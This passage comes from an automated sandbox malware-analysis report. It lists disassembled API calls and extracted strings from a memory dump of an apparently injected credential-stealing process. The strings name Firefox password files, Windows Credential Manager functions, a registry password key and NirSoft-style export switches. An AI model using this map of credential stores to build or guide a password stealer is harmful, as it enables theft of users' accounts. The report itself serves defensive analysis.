                                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                          • API String ID: 3884059725-3138536805
                                                                                                                                                                                                                          • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                          • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                          • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                          • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                          • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                          • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                                                          • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                          • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 113626815-1670831295
                                                                                                                                                                                                                          • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                          • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                          • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                          • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                          • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                          • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                          • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                          • String ID: Creds$ps:password
                                                                                                                                                                                                                          • API String ID: 551151806-1872227768
                                                                                                                                                                                                                          • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                          • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                          • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                          • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                          • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                          • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                                                          • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                          • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                                                          • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                          • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
